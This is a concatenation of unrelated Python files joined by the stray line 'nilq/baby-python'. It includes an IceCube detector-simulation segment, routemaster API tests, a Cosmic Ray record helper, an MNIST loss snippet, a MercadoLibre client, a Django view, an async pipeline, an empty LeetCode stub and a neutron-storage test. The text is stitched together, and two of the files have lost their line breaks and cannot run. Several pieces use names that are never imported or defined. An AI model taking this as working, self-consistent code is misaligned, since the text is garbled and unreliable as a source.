@icetray.traysegment
def DetectorSim(tray, name,
                RandomService = None,
                RunID = None,
                GCDFile = None,
                KeepMCHits = False,
                KeepPropagatedMCTree = False,
                KeepMCPulses = False,
                SkipNoiseGenerator = False,
                LowMem = False,
                InputPESeriesMapName = "I3MCPESeriesMap",
                BeaconLaunches = True,
                TimeShiftSkipKeys=[],
                FilterTrigger=True):
    """
    Read photon-propagated (MCPE) files, simulate noise, PTM response,
    DOMLaunches, and trigger.

    :param RandomService: the name of a random service to be used by the tank response
    :param RunID: Number of run that will be writtend to I3EventHeader
    :param GCDFile: path to GCD file to read first
    :param KeepMCHits: keep MCPEs in frame
    :param KeepPropagatedMCTree: keep MCTree with all in-ice propagated secondaries.
        These take a lot of space compared un propagated tree.
    :param KeepMCPulses: keep I3MCPulseSeriesMap in frame.
    :param SkipNoiseGenerator: do not run Vuvuzela.
    :param LowMem: reduce peak memory use by repeatedly merging hits as they are
        generated. WARNING: Use of this option may slightly reduce precision and
        drastically increase running time. It is potentially useful for very
        bright events, and probably harmful for very long events.
    :param InputPESeriesMapName: name of input I3MCPESeriesMap object.
    :param BeaconLaunches: add beacon lauches.
    :param TimeShiftSkipKeys: list of keys that should be time-shifted. Default:
        shift all Time-like objects.
    :param FilterTrigger: remove events that don't pass any trigger.
    """
    from icecube import icetray, dataclasses, dataio, phys_services
    from icecube import trigger_sim
    from I3Tray import I3Units
    # NOTE(review): DOMLauncher/topsimulator (and phys_services) appear to be
    # imported for their C++ module-registration side effects as well as
    # direct use — do not remove.
    from icecube import DOMLauncher
    from icecube import topsimulator

    if RunID is None:
        icetray.logging.log_fatal("You *must* set a RunID in production.")

    if not RandomService:
        icetray.logging.log_fatal("You *must* set a RandomService name.")

    MCPESeriesMapNames = [
        InputPESeriesMapName,
        "BackgroundI3MCPESeriesMap",
        "SignalI3MCPEs"
    ]
    MCPulseSeriesMapNames = [
        "I3MCPulseSeriesMap",
        "I3MCPulseSeriesMapParticleIDMap"
    ]
    MCTreeNames = [
        "I3MCTree",
        "BackgroundI3MCTree",
        "SignalMCTree"
    ]
    MCPMTResponseMapNames = []

    if not SkipNoiseGenerator:
        InputPESeriesMapName_withoutNoise = InputPESeriesMapName + "WithoutNoise"
        tray.Add("Rename", "RenamePESeriesMap",
                 Keys=[InputPESeriesMapName, InputPESeriesMapName_withoutNoise])
        MCPESeriesMapNames.append(InputPESeriesMapName_withoutNoise)

        from icecube import vuvuzela

        tray.AddSegment(vuvuzela.AddNoise, name+"_vuvuzela",
            OutputName = InputPESeriesMapName,
            InputName = InputPESeriesMapName_withoutNoise,
            StartTime = -10.*I3Units.microsecond,
            EndTime = 10.*I3Units.microsecond,
            RandomServiceName = RandomService,
        )

    tray.AddSegment(DOMLauncher.DetectorResponse, "DetectorResponse",
        pmt_config = {'Input':InputPESeriesMapName,
                      'Output':"I3MCPulseSeriesMap",
                      'MergeHits':True,
                      'LowMem':LowMem,
                      'RandomServiceName' : RandomService},
        dom_config = {'Input':'I3MCPulseSeriesMap',
                      'Output':"I3DOMLaunchSeriesMap",
                      'UseTabulatedPT':True,
                      'RandomServiceName' : RandomService,
                      'BeaconLaunches':BeaconLaunches})

    timeshiftargs={'SkipKeys':TimeShiftSkipKeys}
    tray.AddSegment(trigger_sim.TriggerSim,
                    name+'_triggersim',
                    gcd_file=dataio.I3File(GCDFile),  # for trigger auto-configuration
                    run_id = RunID,
                    prune = True,
                    time_shift = True,
                    time_shift_args = timeshiftargs,
                    filter_mode = FilterTrigger
                    )

    tray.AddModule('I3PrimaryPulseMapper', 'MapPrimariesToPulses')

    tray.AddModule('I3TopAddComponentWaveforms', 'AddComponentWaveforms',
                   PESeriesMap='I3MCPESeriesMap',
                   Waveforms="")

    tray.AddModule("Delete", name+"_cleanup",
                   Keys = ["MCTimeIncEventID",
                           "MCPMTResponseMap",
                           ])

    if not KeepMCPulses:
        tray.AddModule("Delete", name+"_cleanup_2",
                       Keys = MCPulseSeriesMapNames + MCPMTResponseMapNames)

    if not KeepMCHits:
        tray.AddModule("Delete", name+"_cleanup_I3MCHits_2",
                       Keys = MCPESeriesMapNames)

    if not KeepPropagatedMCTree: # Always keep original tree
        tray.AddModule("Delete", name+"_cleanup_I3MCTree_3",
                       Keys = MCTreeNames)


@icetray.traysegment
def DetectorSegment(tray,name,If=lambda f:True,
                    gcdfile='',
                    mctype='corsika_weighted',
                    MCPESeriesMapName='I3MCPESeriesMap',
                    detector_label='IC86:2012',
                    runtrigger=True,
                    filtertrigger=True,
                    stats={},
                    basicHisto=False,
                    icetop=False,
                    genie=False,
                    prescale=1,
                    uselineartree=True,
                    lowmem=False,
                    BeaconLaunches=True,
                    TimeShiftSkipKeys=[],
                    GeneratedEfficiency=0.0,
                    SampleEfficiency=0.0,
                    RunID=None,
                    KeepMCHits = False,
                    KeepPropagatedMCTree = False,
                    KeepMCPulses = False,
                    ):
    """
    Run IC86 detector simulation
    """
    from .. import segments

    # Combine MCPEs from both detectors
    if genie:
        tray.Add("Rename", Keys=[MCPESeriesMapName, 'GenieMCPEs'])
        tray.Add("I3CombineMCPE",
                 InputResponses = ["GenieMCPEs", "BackgroundMCPEs"],
                 OutputResponse = MCPESeriesMapName)
        tray.Add("Delete", Keys=['BackgroundMCPEs','GenieMCPEs'])

    if icetop:
        tray.Add("Rename", Keys=[MCPESeriesMapName, 'InIceMCPEs'])
        tray.Add("I3CombineMCPE",
                 InputResponses = ["IceTopMCPEs", "InIceMCPEs"],
                 OutputResponse = MCPESeriesMapName)
        tray.Add("Delete", Keys=['InIceMCPEs', 'IceTopMCPEs'])

    # Sample a different efficiency
    if SampleEfficiency > 0.0:
        if SampleEfficiency > GeneratedEfficiency:
            # Bug fix: was `icecube.icetray.logging.log_fatal` but only
            # `icetray` is imported at module scope (NameError).
            icetray.logging.log_fatal(
                'Cannot upscale from GeneratedEfficiency %s to SampleEfficiency %s' % (
                    SampleEfficiency, GeneratedEfficiency))
        tray.AddSegment(segments.MultiDomEffSample,"resample",
            GeneratedEfficiency=GeneratedEfficiency,
            SampleEfficiencies=[SampleEfficiency],
            InputSeriesName=MCPESeriesMapName,
            DeleteOriginalSeries=True,
            OverwriteOriginalSeries=True,
        )

    tray.AddSegment(DetectorSim, "DetectorSim",
        RandomService = 'I3RandomService',
        GCDFile = gcdfile,
        InputPESeriesMapName = MCPESeriesMapName,
        KeepMCHits = KeepMCHits,
        KeepMCPulses = KeepMCPulses,
        KeepPropagatedMCTree = KeepPropagatedMCTree,
        LowMem = lowmem,
        BeaconLaunches=BeaconLaunches,
        SkipNoiseGenerator = False,
        TimeShiftSkipKeys = TimeShiftSkipKeys,
        FilterTrigger=filtertrigger,
        RunID=RunID)

    # (Removed unused function-local import of DAQCounter.)
    from ..util import BasicCounter
    tray.AddModule(BasicCounter,"count_triggers",
                   Streams = [icetray.I3Frame.DAQ] ,
                   name="%s Triggered Events" % detector_label,
                   Stats=stats)

    # NOTE(review): `skipkeys` is built but never passed to a writer in this
    # file — presumably consumed by a downstream segment; confirm before
    # removing.
    skipkeys = [ "I3Triggers", "EnhancementFactor", "MCPMTResponseMap", "MCTimeIncEventID"]
    skipkeys += ["IceTopRawData_unused","MCPMTResponseMap","MCTopHitSeriesMap"]
    if "NKGInfo" in skipkeys:  # Keep NKGInfo for IceTop
        skipkeys.remove("NKGInfo")

    if uselineartree:
        tray.AddModule(ConvertToLinearizedMCTree,"lineartree",streams=[icetray.I3Frame.DAQ])
nilq/baby-python
python
"""API tests for the routemaster HTTP endpoints (root, labels, lifecycle)."""

import json
from unittest import mock

from routemaster.db import Label, History


def test_root(client, version):
    response = client.get('/')
    assert response.json == {
        'status': 'ok',
        'state-machines': '/state-machines',
        'version': version,
    }


def test_root_error_state(client, version):
    with mock.patch(
        'sqlalchemy.orm.query.Query.one',
        side_effect=RuntimeError,
    ):
        response = client.get('/')
    assert response.status_code == 503
    assert response.json == {
        'status': 'error',
        'message': 'Cannot connect to database',
        'version': version,
    }


def test_enumerate_state_machines(client, app):
    response = client.get('/state-machines')
    assert response.status_code == 200
    assert response.json == {'state-machines': [
        {
            'name': state_machine.name,
            'labels': f'/state-machines/{state_machine.name}/labels',
        }
        for state_machine in app.config.state_machines.values()
    ]}


def test_create_label(client, app, mock_test_feed):
    label_name = 'foo'
    state_machine = app.config.state_machines['test_machine']
    label_metadata = {'bar': 'baz'}

    with mock_test_feed():
        response = client.post(
            f'/state-machines/{state_machine.name}/labels/{label_name}',
            data=json.dumps({'metadata': label_metadata}),
            content_type='application/json',
        )

    assert response.status_code == 201
    assert response.json['metadata'] == {'bar': 'baz'}

    with app.new_session():
        label = app.session.query(Label).one()
        assert label.name == label_name
        assert label.state_machine == state_machine.name
        assert label.metadata == label_metadata

        history = app.session.query(History).one()
        assert history.label_name == label_name
        assert history.old_state is None
        assert history.new_state == state_machine.states[0].name


def test_create_label_404_for_not_found_state_machine(client):
    response = client.post(
        '/state-machines/nonexistent_machine/labels/foo',
        data=json.dumps({'metadata': {'bar': 'baz'}}),
        content_type='application/json',
    )
    assert response.status_code == 404


def test_create_label_400_for_invalid_body(client):
    response = client.post(
        '/state-machines/test_machine/labels/foo',
        data='not valid json',
        content_type='application/json',
    )
    assert response.status_code == 400


def test_create_label_400_for_missing_metadata_key(client):
    response = client.post(
        '/state-machines/test_machine/labels/foo',
        data=json.dumps({}),
        content_type='application/json',
    )
    assert response.status_code == 400


def test_create_label_409_for_already_existing_label(client, create_label):
    create_label('foo', 'test_machine', {})
    response = client.post(
        '/state-machines/test_machine/labels/foo',
        data=json.dumps({'metadata': {}}),
        content_type='application/json',
    )
    assert response.status_code == 409


def test_update_label(client, app, create_label, mock_webhook, mock_test_feed):
    create_label('foo', 'test_machine', {})

    label_metadata = {'bar': 'baz'}
    with mock_webhook(), mock_test_feed():
        response = client.patch(
            '/state-machines/test_machine/labels/foo',
            data=json.dumps({'metadata': label_metadata}),
            content_type='application/json',
        )

    assert response.status_code == 200
    assert response.json['metadata'] == label_metadata

    with app.new_session():
        label = app.session.query(Label).one()
        assert label.metadata == label_metadata


def test_update_label_404_for_not_found_label(client):
    response = client.patch(
        '/state-machines/test_machine/labels/foo',
        data=json.dumps({'metadata': {'foo': 'bar'}}),
        content_type='application/json',
    )
    assert response.status_code == 404


def test_update_label_404_for_not_found_state_machine(client):
    response = client.patch(
        '/state-machines/nonexistent_machine/labels/foo',
        data=json.dumps({'metadata': {'foo': 'bar'}}),
        content_type='application/json',
    )
    assert response.status_code == 404


def test_update_label_400_for_invalid_body(client, create_label):
    create_label('foo', 'test_machine', {})
    response = client.patch(
        '/state-machines/test_machine/labels/foo',
        data='not valid json',
        content_type='application/json',
    )
    assert response.status_code == 400


def test_update_label_400_for_no_metadata(client, app, create_label):
    create_label('foo', 'test_machine', {})

    label_metadata = {'bar': 'baz'}
    response = client.patch(
        '/state-machines/test_machine/labels/foo',
        data=json.dumps({'not_metadata': label_metadata}),
        content_type='application/json',
    )
    assert response.status_code == 400


def test_get_label(client, create_label):
    create_label('foo', 'test_machine', {'bar': 'baz'})
    response = client.get('/state-machines/test_machine/labels/foo')
    assert response.status_code == 200
    assert response.json['metadata'] == {'bar': 'baz'}


def test_get_label_has_state(client, create_label):
    create_label('foo', 'test_machine', {'bar': 'baz'})
    response = client.get('/state-machines/test_machine/labels/foo')
    assert response.status_code == 200
    assert response.json['state'] == 'start'


def test_get_label_404_for_not_found_label(client, create_label):
    response = client.get('/state-machines/test_machine/labels/foo')
    assert response.status_code == 404


def test_get_label_404_for_not_found_state_machine(client, create_label):
    create_label('foo', 'test_machine', {'bar': 'baz'})
    response = client.get('/state-machines/nonexistent_machine/labels/foo')
    assert response.status_code == 404


def test_list_labels_404_for_not_found_state_machine(client, create_label):
    response = client.get('/state-machines/nonexistent_machine/labels')
    assert response.status_code == 404


def test_list_labels_when_none(client, create_label):
    response = client.get('/state-machines/test_machine/labels')
    assert response.status_code == 200
    assert response.json['labels'] == []


def test_list_labels_includes_link_to_create_labels(client, create_label):
    response = client.get('/state-machines/test_machine/labels')
    assert response.status_code == 200
    assert (
        response.json['create'] ==
        '/state-machines/test_machine/labels/:name'
    )


def test_list_labels_when_one(client, create_label):
    create_label('foo', 'test_machine', {'bar': 'baz'})
    response = client.get('/state-machines/test_machine/labels')
    assert response.status_code == 200
    assert response.json['labels'] == [{'name': 'foo'}]


def test_list_labels_when_many(client, create_label):
    create_label('foo', 'test_machine', {'bar': 'baz'})
    create_label('quox', 'test_machine', {'spam': 'ham'})
    response = client.get('/state-machines/test_machine/labels')
    assert response.status_code == 200
    # Always returned in alphabetical order
    assert response.json['labels'] == [{'name': 'foo'}, {'name': 'quox'}]


def test_update_label_moves_label(client, create_label, app, mock_webhook,
                                  mock_test_feed, current_state):
    label = create_label('foo', 'test_machine', {})

    with mock_webhook() as webhook, mock_test_feed():
        response = client.patch(
            '/state-machines/test_machine/labels/foo',
            data=json.dumps({'metadata': {'should_progress': True}}),
            content_type='application/json',
        )
        webhook.assert_called_once()

    assert response.status_code == 200
    assert response.json['metadata'] == {'should_progress': True}
    assert current_state(label) == 'end'


def test_delete_existing_label(client, app, create_label):
    label_name = 'foo'
    state_machine = app.config.state_machines['test_machine']

    create_label(label_name, state_machine.name, {'bar': 'baz'})

    response = client.delete(
        f'/state-machines/{state_machine.name}/labels/{label_name}',
        content_type='application/json',
    )

    assert response.status_code == 204

    with app.new_session():
        label = app.session.query(Label).one()
        assert label.name == label_name
        assert label.state_machine == state_machine.name
        assert label.metadata == {}

        history = app.session.query(History).order_by(
            History.id.desc(),
        ).first()
        assert history is not None
        assert history.label_name == label_name
        assert history.old_state == state_machine.states[0].name
        assert history.new_state is None


def test_delete_non_existent_label(client, app):
    # When deleting a non-existent label, we do nothing.
    # (Fixed: f-string prefix removed — the URL has no placeholders.)
    response = client.delete(
        '/state-machines/test_machine/labels/foo',
        content_type='application/json',
    )

    assert response.status_code == 204

    with app.new_session():
        assert app.session.query(Label).count() == 0
        assert app.session.query(History).count() == 0


def test_delete_label_404_for_not_found_state_machine(client):
    response = client.delete(
        '/state-machines/nonexistent_machine/labels/foo',
        content_type='application/json',
    )
    assert response.status_code == 404


def test_list_labels_excludes_deleted_labels(
    client,
    create_label,
    create_deleted_label,
    app,
):
    create_deleted_label('foo', 'test_machine')
    create_label('quox', 'test_machine', {'spam': 'ham'})
    response = client.get('/state-machines/test_machine/labels')
    assert response.status_code == 200
    assert response.json['labels'] == [{'name': 'quox'}]


def test_get_label_410_for_deleted_label(
    client,
    create_deleted_label,
    app,
):
    create_deleted_label('foo', 'test_machine')
    response = client.get('/state-machines/test_machine/labels/foo')
    assert response.status_code == 410


def test_create_label_409_for_deleted_label(client, create_label):
    create_label('foo', 'test_machine', {})
    response = client.post(
        '/state-machines/test_machine/labels/foo',
        data=json.dumps({'metadata': {}}),
        content_type='application/json',
    )
    assert response.status_code == 409


def test_update_label_410_for_deleted_label(
    client,
    create_deleted_label,
    app,
):
    create_deleted_label('foo', 'test_machine')
    response = client.patch(
        '/state-machines/test_machine/labels/foo',
        data=json.dumps({'metadata': {'foo': 'bar'}}),
        content_type='application/json',
    )
    assert response.status_code == 410
nilq/baby-python
python
"""A `WorkItem` carries information about potential and completed work in the Cosmic Ray system. `WorkItem` is one of the central structures in CR. It can describe both work to be done and work that has been done, and it indicates how test sessions have completed. """ def make_record(name, fields=(), docstring=""): """Create a new record class. A Record is fundamentally a dict with a specified set of keys. These keys will always have a value (defaulting to None), they can't be removed, and new keys can not be added. This may sound a lot like a class, and that's true. The main benefit of records is that they can be treated directly like dicts for the most part, and, critically, they are easy to JSON-ify. Also, like classes, they ensure that they're only used in the correct way, i.e. users can only access the specified fields. This prevents the confusion of using simple dicts where people can use conflicting or confusing key names. Args: name: The name of the class to be created. fields: The names of the fields in the record. docstring: The docstring for the record class. Returns: A new class derived from dict with the specified fields. 
""" def __init__(self, vals=None, **kwargs): dict.__init__(self, dict.fromkeys(fields)) values = vals or dict() kwargs.update(values) for key, value in kwargs.items(): self[key] = value def __getattr__(self, name): try: return self[name] except KeyError: raise AttributeError('no attribute {}'.format(name)) def __setattr__(self, name, value): try: self[name] = value except KeyError: raise AttributeError('no attribute {}'.format(name)) def __getitem__(self, name): if name not in self: raise KeyError('no field {} in record'.format(name)) return dict.__getitem__(self, name) def __setitem__(self, name, value): if name not in self: raise KeyError('no field {} in record'.format(name)) dict.__setitem__(self, name, value) def __delitem__(self, name): # pylint: disable=unused-argument msg = 'record does not support deleting fields: {}'.format(name) raise KeyError(msg) def update(self, container): """Add all key-value pairs from `container` into this record. If there are duplicate keys, those in `container` will overwrite those here. """ for key, values in container.items(): self[key] = values attrs = { '__init__': __init__, '__getattr__': __getattr__, '__setattr__': __setattr__, '__getitem__': __getitem__, '__setitem__': __setitem__, '__delitem__': __delitem__, 'update': update } rec = type(name, (dict,), attrs) rec.__doc__ = docstring return rec WorkItem = make_record( # pylint: disable=invalid-name 'WorkItem', [ # Arbitrary data returned by the concrete TestRunner to provide more # information about the test results. 'data', # A test_runner.TestOutcome from the test run. 'test_outcome', # A worker.WorkOutcome describing how the worker completed. 'worker_outcome', # The diff produced by the operators 'diff', # the module to be mutated 'module', # The name of the operators 'operator', # The occurrence on which the operator was applied. 'occurrence', # The line number at which the operator was applied. 
'line_number', 'command_line', 'job_id' ], docstring=" The details of a specific mutation and test run in CosmicRay." )
nilq/baby-python
python
import sys, os
sys.path.append(os.pardir)
import numpy as np
from dataset.mnist import load_mnist

# Load MNIST with labels one-hot encoded and pixels normalized to [0, 1].
(x_train, t_train), (x_test, t_test) = \
    load_mnist(normalize=True, one_hot_label=True)

train_size = x_train.shape[0]
batch_size = 10
# Sample a random mini-batch of row indices from the training set.
batch_mask = np.random.choice(train_size, batch_size)
x_batch = x_train[batch_mask]
t_batch = t_train[batch_mask]


def cross_entropy_error(y, t):
    """Mini-batch cross-entropy loss for one-hot targets.

    Parameters
    ----------
    y : np.ndarray
        Predicted class probabilities, shape ``(n_classes,)`` for a single
        sample or ``(batch, n_classes)`` for a batch.
    t : np.ndarray
        One-hot target labels with the same shape as ``y`` (the data above
        is loaded with ``one_hot_label=True``).

    Returns
    -------
    float
        Cross-entropy averaged over the batch.
    """
    # Promote a single sample to a 1-row batch so the math below is uniform.
    if y.ndim == 1:
        t = t.reshape(1, t.size)
        y = y.reshape(1, y.size)

    batch_size = y.shape[0]
    # Fixes two bugs in the original:
    #  * ``np.arrange`` does not exist (typo for ``np.arange``) and raised
    #    AttributeError at runtime.
    #  * It mixed the one-hot form (``t * log(...)``) with integer label
    #    fancy-indexing.  For one-hot targets the correct expression is
    #    ``-sum(t * log(y))``; a small epsilon guards against log(0).
    return -np.sum(t * np.log(y + 1e-7)) / batch_size
nilq/baby-python
python
import requests

from src.mercadolibre.OAuth import OAuth
from src.mercadolibre.enums import paths
from src.mercadolibre.enums.HttpMethods import HttpMethods


class Client:
    """Thin HTTP client for the MercadoLibre REST API.

    Sends bearer-token-authenticated requests and, when the API responds
    with an ``invalid_grant``/``not_found`` OAuth error, refreshes the
    access token and retries the request once.
    """

    def __init__(self, access_token=None, refresh_token=None):
        self.access_token = access_token
        self.refresh_token = refresh_token
        self.method = HttpMethods.GET
        self.url = ''
        self.headers = None
        self.query_params = None
        # Bug fix: the original initialised ``request_params`` but the rest
        # of the class reads/writes ``self.data`` (previously set only
        # inside ``request``), so ``__submit_request`` would raise
        # AttributeError if invoked first.  ``request_params`` is kept for
        # backward compatibility with any external readers.
        self.request_params = None
        self.data = None
        self.is_search = False
        self.object_name = None
        self.response_data_list = []

    def request(self, method=HttpMethods.GET, path=None, query_params=None, data=None):
        """Perform an API request, refreshing the token once on auth failure.

        :param method: HTTP verb (``HttpMethods`` member).
        :param path: path appended to ``paths.BASE_URL``.
        :param query_params: optional dict of query-string parameters.
        :param data: optional JSON-serialisable request body.
        :return: ``(response, tokens)`` — ``tokens`` is ``None`` unless a
            refresh happened, in which case it is a dict with the new
            ``access_token`` and ``refresh_token``.
        """
        self.method = method
        self.url = f'{paths.BASE_URL}{path}'
        self.query_params = query_params
        self.data = data

        response = self.__submit_request()

        tokens = None
        # Parse the body once (the original called response.json() twice).
        body = response.json()
        # Successful list payloads carry no ``error`` key; only inspect
        # dict-shaped payloads for an OAuth error.
        if not isinstance(body, list):
            error = body.get('error')
            if error in ('invalid_grant', 'not_found') and self.access_token:
                tokens = self.__refresh_token()
                # Retry once with the freshly issued access token.
                response = self.__submit_request()

        return response, tokens

    def __submit_request(self):
        # Rebuild headers on every call so a refreshed token is picked up.
        self.__set_headers()
        response = requests.request(method=self.method,
                                    url=self.url,
                                    headers=self.headers,
                                    params=self.query_params,
                                    json=self.data)
        return response

    def __set_headers(self):
        if self.access_token:
            self.headers = {'Authorization': f'Bearer {self.access_token}'}

    def __refresh_token(self):
        response = OAuth().refresh_token(refresh_token=self.refresh_token)
        response_json = response.json()
        self.access_token = response_json.get('access_token')
        return {'access_token': self.access_token,
                'refresh_token': response_json.get('refresh_token')}
nilq/baby-python
python
from django.shortcuts import render, redirect
from django.contrib.auth.forms import UserCreationForm
from django.contrib import messages


# Create your views here.
def register(request):
    """Handle user sign-up.

    GET  -> render an empty ``UserCreationForm``.
    POST -> validate the submitted form; on success persist the new user,
    flash a confirmation message and redirect to the blog home page.
    On validation failure the bound form (with errors) is re-rendered.
    """
    if request.method == 'POST':
        form = UserCreationForm(request.POST)
        if form.is_valid():
            # Bug fix: the original flashed "Account created" and redirected
            # without ever calling save(), so no user was actually created.
            form.save()
            username = form.cleaned_data.get('username')
            messages.success(request, f'Account created for {username}!')
            return redirect('blog-home')
    else:
        form = UserCreationForm()
    return render(request, 'users/register.html', {'form': form})
nilq/baby-python
python
"""""" __all__ = ['Pipeline'] # Standard library modules. import asyncio # Third party modules. from loguru import logger import tqdm # Local modules. # Globals and constants variables. class Pipeline: def __init__(self, tasks, stop_on_failure=False): self.tasks = tuple(tasks) self.stop_on_failure = stop_on_failure async def run(self, progress=True): """ Runs the *inputdata* through the pipeline. """ success_tasks = [] it = enumerate(self.tasks) if progress: it = tqdm.tqdm(it, total=len(self.tasks)) for i, task in it: task_name = task.name if progress: it.set_description(task_name) logger.debug('Running task #{}: {}', i, task_name) # Run task. try: success = await task.run(progress=progress) except: logger.exception('Task #{} failed: {}', i, task_name) success = False if self.stop_on_failure: raise if success: success_tasks.append(task) logger.debug('Task #{} succeeded: {}', i, task_name) else: logger.debug('Task #{} skipped: {}', i, task_name) return success_tasks
nilq/baby-python
python
class Solution:
    def maxIncreaseKeepingSkyline(self, grid: List[List[int]]) -> int:
        """Return the maximum total height increase of the buildings in
        ``grid`` that keeps both skylines (viewed along rows and along
        columns) unchanged.

        The skyline from the left/right is the maximum of each row; from
        the top/bottom, the maximum of each column.  A building at (i, j)
        can rise to ``min(row_max[i], col_max[j])`` without altering
        either skyline, so the answer is the sum of those gaps.

        Bug fix: the original method had no body at all.
        """
        row_max = [max(row) for row in grid]
        col_max = [max(col) for col in zip(*grid)]
        return sum(
            min(row_max[i], col_max[j]) - height
            for i, row in enumerate(grid)
            for j, height in enumerate(row)
        )
nilq/baby-python
python
#!/usr/bin/env python
#

import os, unittest

here = os.path.abspath(os.path.dirname(__file__))


class TestCase(unittest.TestCase):
    """Integration test: neutron storage behaviour when zero neutrons are
    saved, driven by the shell script in the work directory."""

    def test(self):
        "neutron_storage: no neutron saved"
        workdir = 'NeutronStorage-zero-neutrons'
        saved = os.path.abspath('.')
        os.chdir(workdir)
        try:
            # os.system returns a nonzero status on failure.
            if os.system('bash test.sh'):
                raise RuntimeError("Failed")
        finally:
            # Bug fix: the original captured ``saved`` but never used it,
            # leaking the chdir into any subsequently run tests.  Restore
            # the working directory even when the script fails.
            os.chdir(saved)

    pass  # end of TestCase


if __name__ == "__main__":
    unittest.main()

# End of file
nilq/baby-python
python